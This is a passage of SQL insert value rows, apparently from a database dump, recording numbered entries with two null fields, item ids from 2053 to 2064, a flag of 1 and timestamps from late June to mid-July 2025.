(17928, NULL, NULL, 2054, 1, '2025-06-30 02:31:15'),
(17929, NULL, NULL, 2053, 1, '2025-06-30 03:27:56'),
(17930, NULL, NULL, 2064, 1, '2025-06-30 08:04:08'),
(17931, NULL, NULL, 2063, 1, '2025-06-30 11:51:44'),
(17932, NULL, NULL, 2062, 1, '2025-06-30 12:56:44'),
(17933, NULL, NULL, 2053, 1, '2025-06-30 13:49:29'),
(17934, NULL, NULL, 2060, 1, '2025-06-30 14:40:25'),
(17935, NULL, NULL, 2062, 1, '2025-06-30 15:04:44'),
(17936, NULL, NULL, 2064, 1, '2025-06-30 16:47:18'),
(17937, NULL, NULL, 2054, 1, '2025-06-30 18:12:54'),
(17938, NULL, NULL, 2061, 1, '2025-06-30 18:13:03'),
(17939, NULL, NULL, 2060, 1, '2025-06-30 19:46:37'),
(17940, NULL, NULL, 2064, 1, '2025-06-30 19:46:55'),
(17941, NULL, NULL, 2064, 1, '2025-06-30 20:08:22'),
(17942, NULL, NULL, 2063, 1, '2025-06-30 20:40:40'),
(17943, NULL, NULL, 2063, 1, '2025-06-30 22:32:31'),
(17944, NULL, NULL, 2062, 1, '2025-06-30 22:32:31'),
(17945, NULL, NULL, 2061, 1, '2025-06-30 22:32:31'),
(17946, NULL, NULL, 2060, 1, '2025-06-30 23:12:15'),
(17947, NULL, NULL, 2054, 1, '2025-07-01 01:16:32'),
(17948, NULL, NULL, 2053, 1, '2025-07-01 02:46:31'),
(17949, NULL, NULL, 2060, 1, '2025-07-01 03:59:03'),
(17950, NULL, NULL, 2064, 1, '2025-07-01 04:23:04'),
(17951, NULL, NULL, 2060, 1, '2025-07-01 04:31:28'),
(17952, NULL, NULL, 2063, 1, '2025-07-01 04:42:20'),
(17953, NULL, NULL, 2061, 1, '2025-07-01 04:50:51'),
(17954, NULL, NULL, 2062, 1, '2025-07-01 05:13:15'),
(17955, NULL, NULL, 2059, 1, '2025-07-01 06:05:57'),
(17956, NULL, NULL, 2060, 1, '2025-07-01 06:47:52'),
(17957, NULL, NULL, 2055, 1, '2025-07-01 09:02:48'),
(17958, NULL, NULL, 2064, 1, '2025-07-01 09:39:49'),
(17959, NULL, NULL, 2055, 1, '2025-07-01 10:18:05'),
(17960, NULL, NULL, 2054, 1, '2025-07-01 10:49:14'),
(17961, NULL, NULL, 2064, 1, '2025-07-01 10:58:37'),
(17962, NULL, NULL, 2058, 1, '2025-07-01 11:07:36'),
(17963, NULL, NULL, 2053, 1, '2025-07-01 11:57:48'),
(17964, NULL, NULL, 2058, 1, '2025-07-01 13:13:31'),
(17965, NULL, NULL, 2053, 1, '2025-07-01 14:34:32'),
(17966, NULL, NULL, 2054, 1, '2025-07-01 14:36:45'),
(17967, NULL, NULL, 2062, 1, '2025-07-01 15:02:53'),
(17968, NULL, NULL, 2054, 1, '2025-07-01 15:02:54'),
(17969, NULL, NULL, 2053, 1, '2025-07-01 15:05:46'),
(17970, NULL, NULL, 2054, 1, '2025-07-01 15:05:49'),
(17971, NULL, NULL, 2054, 1, '2025-07-01 15:05:52'),
(17972, NULL, NULL, 2063, 1, '2025-07-01 15:06:10'),
(17973, NULL, NULL, 2062, 1, '2025-07-01 15:06:13'),
(17974, NULL, NULL, 2060, 1, '2025-07-01 15:06:16'),
(17975, NULL, NULL, 2059, 1, '2025-07-01 15:06:19'),
(17976, NULL, NULL, 2059, 1, '2025-07-01 15:06:22'),
(17977, NULL, NULL, 2061, 1, '2025-07-01 15:06:25'),
(17978, NULL, NULL, 2058, 1, '2025-07-01 15:06:27'),
(17979, NULL, NULL, 2061, 1, '2025-07-01 16:57:33'),
(17980, NULL, NULL, 2063, 1, '2025-07-01 17:01:04'),
(17981, NULL, NULL, 2062, 1, '2025-07-01 17:25:40'),
(17982, NULL, NULL, 2062, 1, '2025-07-01 20:00:15'),
(17983, NULL, NULL, 2054, 1, '2025-07-01 21:41:29'),
(17984, NULL, NULL, 2060, 1, '2025-07-01 22:28:21'),
(17985, NULL, NULL, 2063, 1, '2025-07-02 06:08:39'),
(17986, NULL, NULL, 2062, 1, '2025-07-02 06:53:42'),
(17987, NULL, NULL, 2062, 1, '2025-07-02 08:37:37'),
(17988, NULL, NULL, 2064, 1, '2025-07-02 11:03:06'),
(17989, NULL, NULL, 2063, 1, '2025-07-02 11:37:37'),
(17990, NULL, NULL, 2055, 1, '2025-07-02 11:37:50'),
(17991, NULL, NULL, 2053, 1, '2025-07-02 11:38:50'),
(17992, NULL, NULL, 2064, 1, '2025-07-02 11:57:10'),
(17993, NULL, NULL, 2062, 1, '2025-07-02 14:49:31'),
(17994, NULL, NULL, 2064, 1, '2025-07-02 17:01:19'),
(17995, NULL, NULL, 2053, 1, '2025-07-02 18:54:40'),
(17996, NULL, NULL, 2053, 1, '2025-07-02 19:07:57'),
(17997, NULL, NULL, 2058, 1, '2025-07-02 19:33:40'),
(17998, NULL, NULL, 2062, 1, '2025-07-02 20:40:41'),
(17999, NULL, NULL, 2061, 1, '2025-07-02 21:03:28'),
(18000, NULL, NULL, 2054, 1, '2025-07-02 21:07:32'),
(18001, NULL, NULL, 2058, 1, '2025-07-02 21:11:52'),
(18002, NULL, NULL, 2055, 1, '2025-07-02 21:24:25'),
(18003, NULL, NULL, 2061, 1, '2025-07-02 21:28:39'),
(18004, NULL, NULL, 2054, 1, '2025-07-02 21:30:59'),
(18005, NULL, NULL, 2058, 1, '2025-07-02 21:37:14'),
(18006, NULL, NULL, 2061, 1, '2025-07-02 22:49:52'),
(18007, NULL, NULL, 2064, 1, '2025-07-02 23:30:57'),
(18008, NULL, NULL, 2063, 1, '2025-07-03 00:14:16'),
(18009, NULL, NULL, 2059, 1, '2025-07-03 02:31:39'),
(18010, NULL, NULL, 2060, 1, '2025-07-03 02:40:12'),
(18011, NULL, NULL, 2062, 1, '2025-07-03 02:57:22'),
(18012, NULL, NULL, 2054, 1, '2025-07-03 03:14:06'),
(18013, NULL, NULL, 2063, 1, '2025-07-03 03:27:20'),
(18014, NULL, NULL, 2063, 1, '2025-07-03 03:38:27'),
(18015, NULL, NULL, 2060, 1, '2025-07-03 03:41:02'),
(18016, NULL, NULL, 2060, 1, '2025-07-03 03:59:34'),
(18017, NULL, NULL, 2064, 1, '2025-07-03 04:09:39'),
(18018, NULL, NULL, 2064, 1, '2025-07-03 04:53:47'),
(18019, NULL, NULL, 2064, 1, '2025-07-03 06:22:29'),
(18020, NULL, NULL, 2059, 1, '2025-07-03 06:52:59'),
(18021, NULL, NULL, 2059, 1, '2025-07-03 06:53:59'),
(18022, NULL, NULL, 2055, 1, '2025-07-03 07:15:21'),
(18023, NULL, NULL, 2059, 1, '2025-07-03 07:30:15'),
(18024, NULL, NULL, 2063, 1, '2025-07-03 07:43:06'),
(18025, NULL, NULL, 2060, 1, '2025-07-03 07:45:10'),
(18026, NULL, NULL, 2058, 1, '2025-07-03 08:43:12'),
(18027, NULL, NULL, 2059, 1, '2025-07-03 09:15:44'),
(18028, NULL, NULL, 2060, 1, '2025-07-03 09:24:32'),
(18029, NULL, NULL, 2055, 1, '2025-07-03 09:47:00'),
(18030, NULL, NULL, 2059, 1, '2025-07-03 10:16:14'),
(18031, NULL, NULL, 2064, 1, '2025-07-03 10:35:23'),
(18032, NULL, NULL, 2055, 1, '2025-07-03 11:33:30'),
(18033, NULL, NULL, 2058, 1, '2025-07-03 11:37:14'),
(18034, NULL, NULL, 2058, 1, '2025-07-03 12:00:56'),
(18035, NULL, NULL, 2064, 1, '2025-07-03 12:04:22'),
(18036, NULL, NULL, 2059, 1, '2025-07-03 12:16:24'),
(18037, NULL, NULL, 2060, 1, '2025-07-03 13:40:35'),
(18038, NULL, NULL, 2062, 1, '2025-07-03 14:51:42'),
(18039, NULL, NULL, 2062, 1, '2025-07-03 17:15:08'),
(18040, NULL, NULL, 2059, 1, '2025-07-03 17:40:55'),
(18041, NULL, NULL, 2054, 1, '2025-07-03 19:28:49'),
(18042, NULL, NULL, 2060, 1, '2025-07-03 20:22:06'),
(18043, NULL, NULL, 2053, 1, '2025-07-03 21:40:30'),
(18044, NULL, NULL, 2060, 1, '2025-07-03 21:51:10'),
(18045, NULL, NULL, 2054, 1, '2025-07-03 22:11:38'),
(18046, NULL, NULL, 2063, 1, '2025-07-03 22:32:44'),
(18047, NULL, NULL, 2064, 1, '2025-07-03 23:35:39'),
(18048, NULL, NULL, 2063, 1, '2025-07-03 23:37:37'),
(18049, NULL, NULL, 2064, 1, '2025-07-03 23:40:25'),
(18050, NULL, NULL, 2061, 1, '2025-07-03 23:40:42'),
(18051, NULL, NULL, 2055, 1, '2025-07-03 23:42:56'),
(18052, NULL, NULL, 2062, 1, '2025-07-03 23:47:26'),
(18053, NULL, NULL, 2059, 1, '2025-07-03 23:51:12'),
(18054, NULL, NULL, 2055, 1, '2025-07-03 23:53:16'),
(18055, NULL, NULL, 2060, 1, '2025-07-03 23:54:52'),
(18056, NULL, NULL, 2054, 1, '2025-07-04 00:00:21'),
(18057, NULL, NULL, 2064, 1, '2025-07-04 00:11:04'),
(18058, NULL, NULL, 2054, 1, '2025-07-04 00:18:43'),
(18059, NULL, NULL, 2058, 1, '2025-07-04 00:25:46'),
(18060, NULL, NULL, 2062, 1, '2025-07-04 00:37:01'),
(18061, NULL, NULL, 2061, 1, '2025-07-04 00:59:52'),
(18062, NULL, NULL, 2064, 1, '2025-07-04 01:27:29'),
(18063, NULL, NULL, 2063, 1, '2025-07-04 02:07:35'),
(18064, NULL, NULL, 2060, 1, '2025-07-04 02:25:52'),
(18065, NULL, NULL, 2060, 1, '2025-07-04 05:28:34'),
(18066, NULL, NULL, 2064, 1, '2025-07-04 05:42:31'),
(18067, NULL, NULL, 2064, 1, '2025-07-04 09:55:32'),
(18068, NULL, NULL, 2053, 1, '2025-07-04 12:28:36'),
(18069, NULL, NULL, 2062, 1, '2025-07-04 14:53:32'),
(18070, NULL, NULL, 2063, 1, '2025-07-04 18:56:44'),
(18071, NULL, NULL, 2053, 1, '2025-07-04 19:56:22'),
(18072, NULL, NULL, 2053, 1, '2025-07-05 01:37:40'),
(18073, NULL, NULL, 2061, 1, '2025-07-05 02:54:16'),
(18074, NULL, NULL, 2064, 1, '2025-07-05 06:43:37'),
(18075, NULL, NULL, 2062, 1, '2025-07-05 06:45:05'),
(18076, NULL, NULL, 2060, 1, '2025-07-05 06:45:14'),
(18077, NULL, NULL, 2063, 1, '2025-07-05 06:46:22'),
(18078, NULL, NULL, 2061, 1, '2025-07-05 06:46:46'),
(18079, NULL, NULL, 2059, 1, '2025-07-05 06:46:54'),
(18080, NULL, NULL, 2058, 1, '2025-07-05 06:47:04'),
(18081, NULL, NULL, 2055, 1, '2025-07-05 06:47:18'),
(18082, NULL, NULL, 2054, 1, '2025-07-05 06:47:25'),
(18083, NULL, NULL, 2060, 1, '2025-07-05 06:47:31'),
(18084, NULL, NULL, 2053, 1, '2025-07-05 07:17:13'),
(18085, NULL, NULL, 2061, 1, '2025-07-05 10:58:11'),
(18086, NULL, NULL, 2059, 1, '2025-07-05 11:34:30'),
(18087, NULL, NULL, 2064, 1, '2025-07-05 13:45:20'),
(18088, NULL, NULL, 2062, 1, '2025-07-05 15:02:58'),
(18089, NULL, NULL, 2060, 1, '2025-07-05 20:19:48'),
(18090, NULL, NULL, 2061, 1, '2025-07-05 22:01:03'),
(18091, NULL, NULL, 2063, 1, '2025-07-05 22:39:13'),
(18092, NULL, NULL, 2064, 1, '2025-07-06 03:12:13'),
(18093, NULL, NULL, 2053, 1, '2025-07-06 07:21:47'),
(18094, NULL, NULL, 2060, 1, '2025-07-06 13:44:06'),
(18095, NULL, NULL, 2063, 1, '2025-07-06 13:50:11'),
(18096, NULL, NULL, 2058, 1, '2025-07-06 14:05:18'),
(18097, NULL, NULL, 2055, 1, '2025-07-06 14:34:31'),
(18098, NULL, NULL, 2064, 1, '2025-07-06 14:40:08'),
(18099, NULL, NULL, 2062, 1, '2025-07-06 15:11:02'),
(18100, NULL, NULL, 2061, 1, '2025-07-06 15:24:41'),
(18101, NULL, NULL, 2062, 1, '2025-07-06 15:53:53'),
(18102, NULL, NULL, 2060, 1, '2025-07-06 16:53:54'),
(18103, NULL, NULL, 2054, 1, '2025-07-06 16:54:52'),
(18104, NULL, NULL, 2059, 1, '2025-07-06 17:10:50'),
(18105, NULL, NULL, 2064, 1, '2025-07-06 17:23:30'),
(18106, NULL, NULL, 2054, 1, '2025-07-06 23:31:33'),
(18107, NULL, NULL, 2064, 1, '2025-07-07 01:03:01'),
(18108, NULL, NULL, 2058, 1, '2025-07-07 03:43:05'),
(18109, NULL, NULL, 2060, 1, '2025-07-07 04:41:47'),
(18110, NULL, NULL, 2063, 1, '2025-07-07 04:47:45'),
(18111, NULL, NULL, 2058, 1, '2025-07-07 05:02:14'),
(18112, NULL, NULL, 2055, 1, '2025-07-07 05:29:24'),
(18113, NULL, NULL, 2061, 1, '2025-07-07 06:21:10'),
(18114, NULL, NULL, 2062, 1, '2025-07-07 06:53:30'),
(18115, NULL, NULL, 2054, 1, '2025-07-07 08:00:29'),
(18116, NULL, NULL, 2059, 1, '2025-07-07 08:16:04'),
(18117, NULL, NULL, 2064, 1, '2025-07-07 08:28:36'),
(18118, NULL, NULL, 2060, 1, '2025-07-07 09:27:24'),
(18119, NULL, NULL, 2063, 1, '2025-07-07 09:34:38'),
(18120, NULL, NULL, 2058, 1, '2025-07-07 09:52:39'),
(18121, NULL, NULL, 2060, 1, '2025-07-07 10:42:57'),
(18122, NULL, NULL, 2063, 1, '2025-07-07 10:56:14'),
(18123, NULL, NULL, 2055, 1, '2025-07-07 11:07:51'),
(18124, NULL, NULL, 2053, 1, '2025-07-07 11:12:18'),
(18125, NULL, NULL, 2058, 1, '2025-07-07 11:29:41'),
(18126, NULL, NULL, 2055, 1, '2025-07-07 12:34:17'),
(18127, NULL, NULL, 2064, 1, '2025-07-07 12:48:21'),
(18128, NULL, NULL, 2061, 1, '2025-07-07 14:22:10'),
(18129, NULL, NULL, 2062, 1, '2025-07-07 14:43:14'),
(18130, NULL, NULL, 2062, 1, '2025-07-07 15:22:45'),
(18131, NULL, NULL, 2061, 1, '2025-07-07 15:55:54'),
(18132, NULL, NULL, 2060, 1, '2025-07-07 16:32:40'),
(18133, NULL, NULL, 2063, 1, '2025-07-07 16:38:35'),
(18134, NULL, NULL, 2058, 1, '2025-07-07 16:53:11'),
(18135, NULL, NULL, 2060, 1, '2025-07-07 17:18:13'),
(18136, NULL, NULL, 2063, 1, '2025-07-07 17:25:46'),
(18137, NULL, NULL, 2058, 1, '2025-07-07 17:44:20'),
(18138, NULL, NULL, 2060, 1, '2025-07-07 18:21:19'),
(18139, NULL, NULL, 2063, 1, '2025-07-07 18:28:34'),
(18140, NULL, NULL, 2060, 1, '2025-07-07 18:40:50'),
(18141, NULL, NULL, 2058, 1, '2025-07-07 18:46:17'),
(18142, NULL, NULL, 2060, 1, '2025-07-07 19:12:30'),
(18143, NULL, NULL, 2053, 1, '2025-07-07 19:14:52'),
(18144, NULL, NULL, 2063, 1, '2025-07-07 19:19:47'),
(18145, NULL, NULL, 2058, 1, '2025-07-07 19:38:04'),
(18146, NULL, NULL, 2055, 1, '2025-07-07 20:14:29'),
(18147, NULL, NULL, 2061, 1, '2025-07-07 21:18:29'),
(18148, NULL, NULL, 2058, 1, '2025-07-07 21:53:06'),
(18149, NULL, NULL, 2062, 1, '2025-07-07 21:56:08'),
(18150, NULL, NULL, 2060, 1, '2025-07-07 22:25:52'),
(18151, NULL, NULL, 2062, 1, '2025-07-07 22:28:44'),
(18152, NULL, NULL, 2064, 1, '2025-07-07 22:35:45'),
(18153, NULL, NULL, 2059, 1, '2025-07-07 22:47:09'),
(18154, NULL, NULL, 2060, 1, '2025-07-07 22:49:13'),
(18155, NULL, NULL, 2063, 1, '2025-07-07 22:57:07'),
(18156, NULL, NULL, 2063, 1, '2025-07-07 22:57:43'),
(18157, NULL, NULL, 2061, 1, '2025-07-07 22:57:46'),
(18158, NULL, NULL, 2062, 1, '2025-07-07 22:57:50'),
(18159, NULL, NULL, 2058, 1, '2025-07-07 23:16:37'),
(18160, NULL, NULL, 2055, 1, '2025-07-07 23:53:45'),
(18161, NULL, NULL, 2061, 1, '2025-07-07 23:54:21'),
(18162, NULL, NULL, 2060, 1, '2025-07-08 00:48:26'),
(18163, NULL, NULL, 2061, 1, '2025-07-08 00:53:16'),
(18164, NULL, NULL, 2063, 1, '2025-07-08 00:55:49'),
(18165, NULL, NULL, 2058, 1, '2025-07-08 01:13:54'),
(18166, NULL, NULL, 2055, 1, '2025-07-08 01:49:29'),
(18167, NULL, NULL, 2061, 1, '2025-07-08 02:51:42'),
(18168, NULL, NULL, 2062, 1, '2025-07-08 03:28:19'),
(18169, NULL, NULL, 2062, 1, '2025-07-08 03:59:57'),
(18170, NULL, NULL, 2060, 1, '2025-07-08 04:03:54'),
(18171, NULL, NULL, 2054, 1, '2025-07-08 04:44:50'),
(18172, NULL, NULL, 2059, 1, '2025-07-08 05:02:07'),
(18173, NULL, NULL, 2064, 1, '2025-07-08 05:15:36'),
(18174, NULL, NULL, 2064, 1, '2025-07-08 05:38:19'),
(18175, NULL, NULL, 2063, 1, '2025-07-08 05:47:02'),
(18176, NULL, NULL, 2060, 1, '2025-07-08 06:18:10'),
(18177, NULL, NULL, 2058, 1, '2025-07-08 06:29:40'),
(18178, NULL, NULL, 2063, 1, '2025-07-08 06:49:54'),
(18179, NULL, NULL, 2060, 1, '2025-07-08 06:58:03'),
(18180, NULL, NULL, 2060, 1, '2025-07-08 07:29:16'),
(18181, NULL, NULL, 2063, 1, '2025-07-08 07:35:43'),
(18182, NULL, NULL, 2058, 1, '2025-07-08 07:51:14'),
(18183, NULL, NULL, 2055, 1, '2025-07-08 08:26:10'),
(18184, NULL, NULL, 2060, 1, '2025-07-08 09:16:43'),
(18185, NULL, NULL, 2063, 1, '2025-07-08 09:22:29'),
(18186, NULL, NULL, 2060, 1, '2025-07-08 09:42:51'),
(18187, NULL, NULL, 2063, 1, '2025-07-08 09:48:34'),
(18188, NULL, NULL, 2058, 1, '2025-07-08 10:03:08'),
(18189, NULL, NULL, 2061, 1, '2025-07-08 10:28:43'),
(18190, NULL, NULL, 2055, 1, '2025-07-08 10:30:40'),
(18191, NULL, NULL, 2061, 1, '2025-07-08 11:21:06'),
(18192, NULL, NULL, 2055, 1, '2025-07-08 11:43:02'),
(18193, NULL, NULL, 2062, 1, '2025-07-08 11:50:49'),
(18194, NULL, NULL, 2054, 1, '2025-07-08 11:54:21'),
(18195, NULL, NULL, 2055, 1, '2025-07-08 11:57:18'),
(18196, NULL, NULL, 2055, 1, '2025-07-08 12:32:13'),
(18197, NULL, NULL, 2054, 1, '2025-07-08 12:53:14'),
(18198, NULL, NULL, 2059, 1, '2025-07-08 13:09:08'),
(18199, NULL, NULL, 2064, 1, '2025-07-08 13:22:00'),
(18200, NULL, NULL, 2060, 1, '2025-07-08 13:53:29'),
(18201, NULL, NULL, 2063, 1, '2025-07-08 13:59:19'),
(18202, NULL, NULL, 2058, 1, '2025-07-08 14:14:13'),
(18203, NULL, NULL, 2055, 1, '2025-07-08 14:42:20'),
(18204, NULL, NULL, 2062, 1, '2025-07-08 15:01:19'),
(18205, NULL, NULL, 2061, 1, '2025-07-08 15:34:00'),
(18206, NULL, NULL, 2062, 1, '2025-07-08 16:04:18'),
(18207, NULL, NULL, 2054, 1, '2025-07-08 17:07:24'),
(18208, NULL, NULL, 2059, 1, '2025-07-08 17:23:03'),
(18209, NULL, NULL, 2060, 1, '2025-07-08 17:48:36'),
(18210, NULL, NULL, 2063, 1, '2025-07-08 17:54:38'),
(18211, NULL, NULL, 2058, 1, '2025-07-08 18:09:39'),
(18212, NULL, NULL, 2060, 1, '2025-07-08 18:41:12'),
(18213, NULL, NULL, 2063, 1, '2025-07-08 18:47:09'),
(18214, NULL, NULL, 2060, 1, '2025-07-08 19:17:04'),
(18215, NULL, NULL, 2063, 1, '2025-07-08 19:24:06'),
(18216, NULL, NULL, 2064, 1, '2025-07-08 19:36:16'),
(18217, NULL, NULL, 2064, 1, '2025-07-08 19:36:21'),
(18218, NULL, NULL, 2062, 1, '2025-07-08 19:40:56'),
(18219, NULL, NULL, 2053, 1, '2025-07-08 19:41:13'),
(18220, NULL, NULL, 2058, 1, '2025-07-08 19:41:56'),
(18221, NULL, NULL, 2061, 1, '2025-07-08 19:42:04'),
(18222, NULL, NULL, 2062, 1, '2025-07-08 19:42:42'),
(18223, NULL, NULL, 2061, 1, '2025-07-08 19:43:31'),
(18224, NULL, NULL, 2063, 1, '2025-07-08 19:43:43'),
(18225, NULL, NULL, 2059, 1, '2025-07-08 19:45:54'),
(18226, NULL, NULL, 2058, 1, '2025-07-08 19:46:11'),
(18227, NULL, NULL, 2063, 1, '2025-07-08 19:46:16'),
(18228, NULL, NULL, 2055, 1, '2025-07-08 19:49:31'),
(18229, NULL, NULL, 2059, 1, '2025-07-08 19:50:09'),
(18230, NULL, NULL, 2054, 1, '2025-07-08 19:50:21'),
(18231, NULL, NULL, 2058, 1, '2025-07-08 19:50:27'),
(18232, NULL, NULL, 2060, 1, '2025-07-08 19:50:39'),
(18233, NULL, NULL, 2055, 1, '2025-07-08 19:55:25'),
(18234, NULL, NULL, 2054, 1, '2025-07-08 19:55:28'),
(18235, NULL, NULL, 2054, 1, '2025-07-08 20:00:52'),
(18236, NULL, NULL, 2060, 1, '2025-07-08 20:17:12'),
(18237, NULL, NULL, 2064, 1, '2025-07-08 20:28:29'),
(18238, NULL, NULL, 2060, 1, '2025-07-08 20:34:39'),
(18239, NULL, NULL, 2063, 1, '2025-07-08 20:42:40'),
(18240, NULL, NULL, 2058, 1, '2025-07-08 21:03:27'),
(18241, NULL, NULL, 2058, 1, '2025-07-08 21:13:03'),
(18242, NULL, NULL, 2060, 1, '2025-07-08 21:16:44'),
(18243, NULL, NULL, 2063, 1, '2025-07-08 21:22:17'),
(18244, NULL, NULL, 2058, 1, '2025-07-08 21:36:06'),
(18245, NULL, NULL, 2054, 1, '2025-07-08 21:44:27'),
(18246, NULL, NULL, 2055, 1, '2025-07-08 22:02:38'),
(18247, NULL, NULL, 2061, 1, '2025-07-08 22:53:01'),
(18248, NULL, NULL, 2060, 1, '2025-07-08 23:37:18'),
(18249, NULL, NULL, 2063, 1, '2025-07-08 23:43:01'),
(18250, NULL, NULL, 2059, 1, '2025-07-08 23:45:13'),
(18251, NULL, NULL, 2058, 1, '2025-07-08 23:57:12'),
(18252, NULL, NULL, 2055, 1, '2025-07-09 00:25:10'),
(18253, NULL, NULL, 2061, 1, '2025-07-09 01:23:29'),
(18254, NULL, NULL, 2053, 1, '2025-07-09 01:52:44'),
(18255, NULL, NULL, 2062, 1, '2025-07-09 01:58:13'),
(18256, NULL, NULL, 2060, 1, '2025-07-09 02:17:19'),
(18257, NULL, NULL, 2054, 1, '2025-07-09 03:10:16'),
(18258, NULL, NULL, 2064, 1, '2025-07-09 03:22:09'),
(18259, NULL, NULL, 2061, 1, '2025-07-09 03:22:34'),
(18260, NULL, NULL, 2060, 1, '2025-07-09 03:22:40'),
(18261, NULL, NULL, 2059, 1, '2025-07-09 03:22:46'),
(18262, NULL, NULL, 2063, 1, '2025-07-09 03:22:51'),
(18263, NULL, NULL, 2062, 1, '2025-07-09 03:23:07'),
(18264, NULL, NULL, 2054, 1, '2025-07-09 03:23:12'),
(18265, NULL, NULL, 2055, 1, '2025-07-09 03:23:18'),
(18266, NULL, NULL, 2058, 1, '2025-07-09 03:23:23'),
(18267, NULL, NULL, 2053, 1, '2025-07-09 03:24:26'),
(18268, NULL, NULL, 2059, 1, '2025-07-09 03:28:22'),
(18269, NULL, NULL, 2064, 1, '2025-07-09 03:43:24'),
(18270, NULL, NULL, 2059, 1, '2025-07-09 04:41:26'),
(18271, NULL, NULL, 2060, 1, '2025-07-09 04:42:37'),
(18272, NULL, NULL, 2064, 1, '2025-07-09 05:01:23'),
(18273, NULL, NULL, 2060, 1, '2025-07-09 07:20:52'),
(18274, NULL, NULL, 2063, 1, '2025-07-09 07:26:50'),
(18275, NULL, NULL, 2058, 1, '2025-07-09 07:41:27'),
(18276, NULL, NULL, 2055, 1, '2025-07-09 08:09:13'),
(18277, NULL, NULL, 2061, 1, '2025-07-09 08:57:28'),
(18278, NULL, NULL, 2064, 1, '2025-07-09 09:02:23'),
(18279, NULL, NULL, 2054, 1, '2025-07-09 09:03:25'),
(18280, NULL, NULL, 2062, 1, '2025-07-09 09:24:25'),
(18281, NULL, NULL, 2062, 1, '2025-07-09 09:25:44'),
(18282, NULL, NULL, 2060, 1, '2025-07-09 10:19:08'),
(18283, NULL, NULL, 2063, 1, '2025-07-09 10:24:53'),
(18284, NULL, NULL, 2058, 1, '2025-07-09 10:39:00'),
(18285, NULL, NULL, 2055, 1, '2025-07-09 11:06:00'),
(18286, NULL, NULL, 2063, 1, '2025-07-09 11:12:03'),
(18287, NULL, NULL, 2064, 1, '2025-07-09 11:42:18'),
(18288, NULL, NULL, 2061, 1, '2025-07-09 11:55:34'),
(18289, NULL, NULL, 2062, 1, '2025-07-09 12:26:02'),
(18290, NULL, NULL, 2053, 1, '2025-07-09 13:11:07'),
(18291, NULL, NULL, 2054, 1, '2025-07-09 13:36:41'),
(18292, NULL, NULL, 2060, 1, '2025-07-09 13:54:18'),
(18293, NULL, NULL, 2059, 1, '2025-07-09 13:54:31'),
(18294, NULL, NULL, 2062, 1, '2025-07-09 14:04:35'),
(18295, NULL, NULL, 2063, 1, '2025-07-09 14:06:27'),
(18296, NULL, NULL, 2064, 1, '2025-07-09 14:09:19'),
(18297, NULL, NULL, 2062, 1, '2025-07-09 14:54:42'),
(18298, NULL, NULL, 2054, 1, '2025-07-09 19:41:29'),
(18299, NULL, NULL, 2064, 1, '2025-07-09 20:23:36'),
(18300, NULL, NULL, 2059, 1, '2025-07-09 20:37:00'),
(18301, NULL, NULL, 2059, 1, '2025-07-09 20:52:29'),
(18302, NULL, NULL, 2064, 1, '2025-07-09 21:20:11'),
(18303, NULL, NULL, 2060, 1, '2025-07-09 21:34:18'),
(18304, NULL, NULL, 2055, 1, '2025-07-09 21:47:25'),
(18305, NULL, NULL, 2054, 1, '2025-07-09 21:49:12'),
(18306, NULL, NULL, 2054, 1, '2025-07-09 22:16:06'),
(18307, NULL, NULL, 2060, 1, '2025-07-10 01:44:56'),
(18308, NULL, NULL, 2059, 1, '2025-07-10 06:42:12'),
(18309, NULL, NULL, 2053, 1, '2025-07-10 07:15:47'),
(18310, NULL, NULL, 2058, 1, '2025-07-10 08:56:51'),
(18311, NULL, NULL, 2058, 1, '2025-07-10 13:01:57'),
(18312, NULL, NULL, 2061, 1, '2025-07-10 13:39:40'),
(18313, NULL, NULL, 2062, 1, '2025-07-10 14:22:33'),
(18314, NULL, NULL, 2064, 1, '2025-07-10 17:14:41'),
(18315, NULL, NULL, 2061, 1, '2025-07-10 17:58:19'),
(18316, NULL, NULL, 2059, 1, '2025-07-10 18:20:47'),
(18317, NULL, NULL, 2058, 1, '2025-07-10 22:12:57'),
(18318, NULL, NULL, 2054, 1, '2025-07-10 22:24:09'),
(18319, NULL, NULL, 2055, 1, '2025-07-10 23:44:55'),
(18320, NULL, NULL, 2059, 1, '2025-07-11 00:18:24'),
(18321, NULL, NULL, 2064, 1, '2025-07-11 01:33:47'),
(18322, NULL, NULL, 2064, 1, '2025-07-11 01:58:15'),
(18323, NULL, NULL, 2053, 1, '2025-07-11 02:06:47'),
(18324, NULL, NULL, 2064, 1, '2025-07-11 04:08:42'),
(18325, NULL, NULL, 2055, 1, '2025-07-11 05:53:17'),
(18326, NULL, NULL, 2055, 1, '2025-07-11 09:48:06'),
(18327, NULL, NULL, 2055, 1, '2025-07-11 10:57:11'),
(18328, NULL, NULL, 2062, 1, '2025-07-11 12:08:00'),
(18329, NULL, NULL, 2064, 1, '2025-07-11 12:34:12'),
(18330, NULL, NULL, 2060, 1, '2025-07-11 13:20:03'),
(18331, NULL, NULL, 2053, 1, '2025-07-11 14:15:24'),
(18332, NULL, NULL, 2062, 1, '2025-07-11 14:29:35'),
(18333, NULL, NULL, 2064, 1, '2025-07-11 19:57:35'),
(18334, NULL, NULL, 2059, 1, '2025-07-11 22:20:44'),
(18335, NULL, NULL, 2060, 1, '2025-07-11 22:25:05'),
(18336, NULL, NULL, 2060, 1, '2025-07-12 03:48:57'),
(18337, NULL, NULL, 2060, 1, '2025-07-12 10:29:44'),
(18338, NULL, NULL, 2061, 1, '2025-07-12 11:03:45'),
(18339, NULL, NULL, 2062, 1, '2025-07-12 14:38:32'),
(18340, NULL, NULL, 2064, 1, '2025-07-12 16:08:50'),
(18341, NULL, NULL, 2061, 1, '2025-07-12 17:44:34'),
(18342, NULL, NULL, 2060, 1, '2025-07-12 18:05:12'),
(18343, NULL, NULL, 2053, 1, '2025-07-12 18:20:34'),
(18344, NULL, NULL, 2061, 1, '2025-07-12 18:36:17'),
(18345, NULL, NULL, 2058, 1, '2025-07-12 18:44:49'),
(18346, NULL, NULL, 2060, 1, '2025-07-12 19:06:46'),
(18347, NULL, NULL, 2060, 1, '2025-07-12 20:28:52'),
(18348, NULL, NULL, 2061, 1, '2025-07-12 22:56:42'),
(18349, NULL, NULL, 2059, 1, '2025-07-12 23:45:29'),
(18350, NULL, NULL, 2064, 1, '2025-07-13 00:02:24'),
(18351, NULL, NULL, 2062, 1, '2025-07-13 02:25:16'),
(18352, NULL, NULL, 2064, 1, '2025-07-13 02:45:43'),
(18353, NULL, NULL, 2063, 1, '2025-07-13 02:55:23'),
(18354, NULL, NULL, 2053, 1, '2025-07-13 03:24:43'),
(18355, NULL, NULL, 2064, 1, '2025-07-13 04:51:23'),
